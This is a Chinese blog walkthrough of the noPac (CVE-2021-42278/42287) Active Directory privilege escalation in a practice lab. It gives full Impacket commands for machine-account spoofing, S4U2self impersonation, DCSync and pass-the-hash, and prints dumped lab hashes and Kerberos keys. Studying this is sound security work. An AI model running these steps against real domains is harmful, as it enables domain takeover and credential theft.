SamAccountName (nopac)
漏洞编号:CVE-2021-42287。
•eXploit – CVE-2021-42287/CVE-2021-42278 Weaponisation•cube0x0/noPac: CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter. (github.com)•sAMAccountName spoofing - The Hacker Recipes•Added -self
, -altservice
and -u2u
to getST for S4U2self abuse, S4U2self+u2u, and service substitution by ShutdownRepo · Pull Request #1202 · fortra/impacket (github.com)•Added renameMachine.py by ShutdownRepo · Pull Request #1224 · fortra/impacket (github.com)
kerberos解决的是你是谁,微软再次基础上增加了PAC (Privilege Attribute Certificate,特权属性证书)解决了你能做什么!完善了权限的流程。
漏洞核心点:
kerberos的处理流程,首先,如果找不到 UserName 的话,KDC会继续查找 UserName$ 。如果还是查找不到的话,KDC会继续查找altSecurityIdentities属性的值的用户。(包含用于身份验证的 X.509 证书或外部 Kerberos 用户帐户与此用户的映射。)
触发点:
eXploit – CVE-2021-42287/CVE-2021-42278 Weaponisation
域内提权漏洞CVE-2021-42287与CVE-2021-42278原理分析 - FreeBuf网络安全行业门户
1.跨域请求:跨域请求时,目标域活动目录数据库是找不到其他域的用户的,因此会走进这个处理UserName的逻辑。2.修改saMAccountName属性:在当前域,可以通过修改saMAccountName属性让KDC找不到用户,然后走进这个处理UserName的逻辑。
但是这还是不够,仅仅让KDC走进这个处理UserName的逻辑,还不能伪造高权限。
因为票据中代表用户身份权限是数据块是PAC。net ads kerberos pac dump -U$USERNAME
而TGT认购权证中的PAC是根据预认证身份信息生成的,这个我们无法伪造。因此得想办法在ST服务票据中进行伪造。而正常的ST服务票据中的PAC是直接拷贝TGT认购权证中的。
因此,得想办法让KDC在TGS-REP的时候重新生成PAC,而不是拷贝TGT票据中的PAC。
1.S4U2Self请求:KDC在处理S4U2Self类型的TGS-REQ请求时,PAC是重新生成的。2.跨域无PAC的TGT票据进行TGS请求:KDC在处理跨域的TGS-REQ请求时,如果携带的TGT认购权证中没有PAC,PAC会重新生成。
CVE-2021-42278 - Name impersonation
计算机帐户的名称中应具有尾随 $
(即 sAMAccountName
属性),但没有验证过程来确保它。它与 CVE-2021-42287 结合使用,允许攻击者冒充域控制器帐户。
CVE-2021-42287 - KDC bamboozlings
在请求服务票证时,首先需要出示TGT。当KDC没有找到请求的服务票证时,KDC将自动再次搜索,并在后面加上$。如果获得了bob的TGT,并且删除了bob用户,那么使用该TGT为自己(S4U2self)请求另一个用户的服务票证将导致KDC在AD中查找bob$。如果域控制器帐户bob$存在,那么bob(用户)就像任何其他用户一样获得了bob(域控制器帐户)的服务票证.
查看是否可以添加用户
在这里使用之前kerberoasting得到的用户north/jon.snow:iknownothing
找个cme模块查看机器账号配额
cme ldap -L
proxychains -q cme ldap winterfell.north.sevenkingdoms.local-u jon.snow -p iknownothing -d north.sevenkingdoms.local-M MAQ
如果是docker启动的cme的话 记得在docker内也设置host的 直接通过ip无法连接ldpa
准备Impacket
因为linux版本的利用工具还没有合并到impacket的主分支中 需要进行如下操作
(不切换分支少脚本,后续利用脚本不存在且会存在错误。)
sudo -s
pip3 uninstall pycrypto
pip3 install pycryptodomex//解决加密报错的问题。
git clone https://github.com/SecureAuthCorp/impacket myimpacket
cd myimpacket
git checkout -b mydev
python3 -m virtualenv myimpacket # 可省略或者换成conda
source myimpacket/bin/activate # 可省略或者换成conda
python3 -m pip install .
获取我们想要的等待拉取请求(您可以在 exegol 安装脚本中找到大量好的 PR 合并:https://github.com/ShutdownRepo/Exegol-images/blame/main/sources/install.sh#L286)
git fetch origin pull/1224/head:1224
git fetch origin pull/1202/head:1202
git merge 1202
git merge 1224
重新排序路径输入结果以在 $PATH 中的其他路径之前加载我们的 pyenv bin(这在 zsh 上是必需的,在 bash 中它直接获取我们的 pyenv bin)
rehash
然后尝试如下命令 ( 其实不执行的话 直接pyhton examples应该也可以)
enameMachine.py
getST.py
exploit
我们要做的是添加一台计算机,清除那台计算机的SPN,重命名成与DC同名的计算机,为计算机获取一个TGT,将计算机名称重置为他原来的名字,使用我们之前获得的 TGT 获得服务票证,最后dcsync
添加计算机
清除我们新计算机的 SPN
重命名计算机(computer -> DC)
获取机器账号的TGT
恢复计算机名
利用之前获得的TGT票据,通过S4U2self协议向DC请求ST
提供ST进行DCSync(卷影拷贝服务读取ntds.dit)
•添加计算机
sudo python3 ./examples/addcomputer.py -computer-name 'samaccountname$'-computer-pass'ComputerPassword'-dc-host winterfell.north.sevenkingdoms.local-domain-netbios NORTH 'north.sevenkingdoms.local/jon.snow:iknownothing'
•清除我们新计算机的服务主体名称(Service Principal Name, SPN)(dirkjanm/krbrelayx)
sudo python3 addspn.py --clear -t 'samaccountname$'-u 'north.sevenkingdoms.localjon.snow'-p 'iknownothing''winterfell.north.sevenkingdoms.local'
•重命名计算机(computer -> DC)
impacket/renameMachine.py at 0c74df065eeffde8c24edb56e880ab49c82530b7 · fortra/impacket · GitHub
sudo python3 renameMachine.py -current-name 'samaccountname$'-new-name 'winterfell'-dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
•获取机器账号的TGT
sudo python3 getTGT.py -dc-ip 'winterfell.north.sevenkingdoms.local''north.sevenkingdoms.local'/'winterfell':'ComputerPassword'
•恢复计算机名
sudo python3 renameMachine.py -current-name 'winterfell'-new-name 'samaccount$' north.sevenkingdoms.local/jon.snow:iknownothing
•利用之前获得的TGT票据,通过S4U2self协议向DC请求ST
S4U2Self: 服务A通过S4U2Self协议,可以从域服务器获取账号B访问应用服务器A的TGS票据,就像账号B主动从域服务器获取一个访问服务A的TGS票据一样。可以理解为通过该协议,可以获取域内任意账号访问服务A的TGS票据,过程中不需要账号B认证到域
export KRB5CCNAME=winterfell.ccache
sudo python3 getST.py -self-impersonate 'administrator'-altservice 'CIFS/winterfell.north.sevenkingdoms.local'-k -no-pass-dc-ip 'winterfell.north.sevenkingdoms.local''north.sevenkingdoms.local'/'winterfell'-debug
获取到了ST
administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache
•提供ST进行DCSync(卷影拷贝服务 读取ntds.dit)
export KRB5CCNAME=administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache
sudo python3 secretsdump.py -k -no-pass-dc-ip 'winterfell.north.sevenkingdoms.local'@'winterfell.north.sevenkingdoms.local'
wulala@wulala-VirtualBox:~/intranet-tools/myimpacket/examples$ python3 secretsdump.py -k -no-pass-dc-ip 'winterfell.north.sevenkingdoms.local'@'winterfell.north.sevenkingdoms.local'
Impacket v0.10.1.dev1+20230511.163246.f3d0b9e5 -Copyright2022Fortra
[*]Target system bootKey:0x5b6e7a363d81053ee669b2c4e3deb1f7
[*]Dumpinglocal SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed.The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
NORTHWINTERFELL$:plain_password_hex:39360354776840b555eba793d3a224f63f4fbc6f7a9ee6e1028014c125b4bc32032900ea1b5b9265b999f6e28b0d2c1eefa0d84eee7f7ddae2aa439c05b062dcc97ba1bb59b55a19284b42fe29f272c50c295711d60867e7f1f59e52dfada9346396f9316890d43652fef0720b595b2cf3c6201444fa1861cea4ff4b3ea159410c0ce7d2a9cb0d2c9e2168a84cb88fb8510616ddbfa6232f4c28ac8756b5840d5f0ffbad8cd08482f80d74d4d403c71e9befbf3eaa8cb1e705023f9eca24a3918bb3b32e2293c14d0f8ce740c7439668e77c755e70e98dedde1feb510ca206584aebe9f67ea5fcb0e522e664b3c17ab7
NORTHWINTERFELL$:aad3b435b51404eeaad3b435b51404ee:c7d77abdc6bcdee8cf4cf1e1c1def774:::
[*] DefaultPassword
NORTHrobb.stark:sexywolfy
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb77f262f9c9abab9bfcba2a9e0f269d87e10accf
dpapi_userkey:0x7e4428ece910efba259e385e5d2cd23b80fa23b2
[*] NL$KM
0000 22 34 01 76 01 70 30 93 88 A7 6B B2 87 43 59 69 "4.v.p0...k..CYi
0010 0E 41 BD 22 0A 0C CC 23 3A 5B B6 74 CB 90 D6 35 .A."...#:[.t...5
0020 14 CA D8 45 4A F0 DB 72 D5 CF 3B A1 ED 7F 3A 98 ...EJ..r..;...:.
0030 CD 4D D6 36 6A 35 24 2D A0 EB 0F 8E 3F 52 81 C9 .M.6j5$-....?R..
NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d1a786683542dc8ce782c3af71dbecc5:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:2c643546d00054420505a2bf86d77c47:::
brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:c7d77abdc6bcdee8cf4cf1e1c1def774:::
CASTELBLACK$:1104:aad3b435b51404eeaad3b435b51404ee:287b58f9e95f6320b02cb6f145767787:::
samaccount$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:a1ecedd368730bf7e6ef16570f918d33:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972
Administrator:aes128-cts-hmac-sha1-96:bb7b6aed58a7a395e0e674ac76c28aa0
Administrator:des-cbc-md5:fe58cdcd13a43243
krbtgt:aes256-cts-hmac-sha1-96:f96ec2ef58e7ac5d8670ff97bafe7e16d27a25c0d29774e64f7b8f4b43ee78dd
krbtgt:aes128-cts-hmac-sha1-96:6265aa3383780121404d894cd629f3ba
krbtgt:des-cbc-md5:5d80d049ecec835d
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
arya.stark:aes256-cts-hmac-sha1-96:2001e8fb3da02f3be6945b4cce16e6abdd304974615d6feca7d135d4009d4f7d
arya.stark:aes128-cts-hmac-sha1-96:8477cba28e7d7cfe5338d172a23d74df
arya.stark:des-cbc-md5:13525243d6643285
eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4
eddard.stark:aes128-cts-hmac-sha1-96:5f9b06a24b90862367ec221a11f92203
eddard.stark:des-cbc-md5:8067f7abecc7d346
catelyn.stark:aes256-cts-hmac-sha1-96:c8302e270b04252251de40b2bd5fba37395b55d5ed9ac95e03213dc739827283
catelyn.stark:aes128-cts-hmac-sha1-96:50ce7e2ad069fa40fb2bc7f5f9643d93
catelyn.stark:des-cbc-md5:6b314670a2f84cfb
robb.stark:aes256-cts-hmac-sha1-96:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a
robb.stark:aes128-cts-hmac-sha1-96:b2965905e68356d63fedd9904357cc42
robb.stark:des-cbc-md5:c4b62c797f5dd01f
sansa.stark:aes256-cts-hmac-sha1-96:cd2460a78e8993442498d3f242a88ae110ec6556e40c8add6aab12cfb44b3fa1
sansa.stark:aes128-cts-hmac-sha1-96:18b9d10bd18d1956ba73c14426ec519f
sansa.stark:des-cbc-md5:e66445757c31c176
brandon.stark:aes256-cts-hmac-sha1-96:6dd181186b68898376d3236662f8aeb8fa68e4b5880744034d293d18b6753b10
brandon.stark:aes128-cts-hmac-sha1-96:9de3581a163bd056073b71ab23142d73
brandon.stark:des-cbc-md5:76e61fda8a4f5245
rickon.stark:aes256-cts-hmac-sha1-96:79ffda34e5b23584b3bd67c887629815bb9ab8a1952ae9fda15511996587dcda
rickon.stark:aes128-cts-hmac-sha1-96:d4a0669b1eff6caa42f2632ebca8cd8d
rickon.stark:des-cbc-md5:b9ec3b8f2fd9d98a
hodor:aes256-cts-hmac-sha1-96:a33579ec769f3d6477a98e72102a7f8964f09a745c1191a705d8e1c3ab6e4287
hodor:aes128-cts-hmac-sha1-96:929126dcca8c698230b5787e8f5a5b60
hodor:des-cbc-md5:d5764373f2545dfd
jon.snow:aes256-cts-hmac-sha1-96:5a1bc13364e758131f87a1f37d2f1b1fa8aa7a4be10e3fe5a69e80a5c4c408fb
jon.snow:aes128-cts-hmac-sha1-96:d8bc99ccfebe2d6e97d15f147aa50e8b
jon.snow:des-cbc-md5:084358ceb3290d7c
samwell.tarly:aes256-cts-hmac-sha1-96:b66738c4d2391b0602871d0a5cd1f9add8ff6b91dcbb7bc325dc76986496c605
samwell.tarly:aes128-cts-hmac-sha1-96:3943b4ac630b0294d5a4e8b940101fae
samwell.tarly:des-cbc-md5:5efed0e0a45dd951
jeor.mormont:aes256-cts-hmac-sha1-96:be10f893afa35457fcf61ecc40dc032399b7aee77c87bb71dd2fe91411d2bd50
jeor.mormont:aes128-cts-hmac-sha1-96:1b0a98958e19d6092c8e8dc1d25c788b
jeor.mormont:des-cbc-md5:1a68641a3e9bb6ea
sql_svc:aes256-cts-hmac-sha1-96:24d57467625d5510d6acfddf776264db60a40c934fcf518eacd7916936b1d6af
sql_svc:aes128-cts-hmac-sha1-96:01290f5b76c04e39fb2cb58330a22029
sql_svc:des-cbc-md5:8645d5cd402f16c7
WINTERFELL$:aes256-cts-hmac-sha1-96:427231ba6db71295c8473e96e9388b667152521f639c725737f7a1fd1293740c
WINTERFELL$:aes128-cts-hmac-sha1-96:272aa17950a7f3fe9c8e30d5fedcdfa7
WINTERFELL$:des-cbc-md5:7ff72c75d5d683b5
CASTELBLACK$:aes256-cts-hmac-sha1-96:56b50b6ea3284c039c56136df98cb55439ae52c75f470695b8b6bc7681b87312
CASTELBLACK$:aes128-cts-hmac-sha1-96:4638c39e9eff75b4066546ea880faf92
CASTELBLACK$:des-cbc-md5:20bafd767f9d57ef
samaccount$:aes256-cts-hmac-sha1-96:7b9a52e2d94aa24dcea3d181001b03380291929a0094fa5b24f44d2a221faa89
samaccount$:aes128-cts-hmac-sha1-96:98c00ce456e342106141609163511daa
samaccount$:des-cbc-md5:f8ab2001bcecc252
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:fdf743184a24dfad6ce6f39bcd85a907f95559780b315b7af21237015d0d8cae
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:9e000305a1ec2cc04c62dcef55a0970f
SEVENKINGDOMS$:des-cbc-md5:4a9475f74ca46d23
[*] Cleaning up...
wulala@wulala-VirtualBox:~/intranet-tools/myimpacket/examples$
现在通过使用刚刚获得的管理员帐户哈希 删除我们创建的计算机 进行清理
sudo python3 addcomputer.py -computer-name 'samaccountname$'-delete-dc-host winterfell.north.sevenkingdoms.local-domain-netbios NORTH -hashes 'aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4''north.sevenkingdoms.local/Administrator'
sudo python3 addcomputer.py -computer-name 'samaccount$'-delete-dc-host winterfell.north.sevenkingdoms.local-domain-netbios NORTH -hashes 'aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4''north.sevenkingdoms.local/Administrator'
利用获得的管理员帐户hash,测试一下exec
sudo python3 smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4'Administrator@north.sevenkingdoms.local
直接上登录,或者搞其他的事情。
原文始发于微信公众号(wulala520):SamAccountName (nopac)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论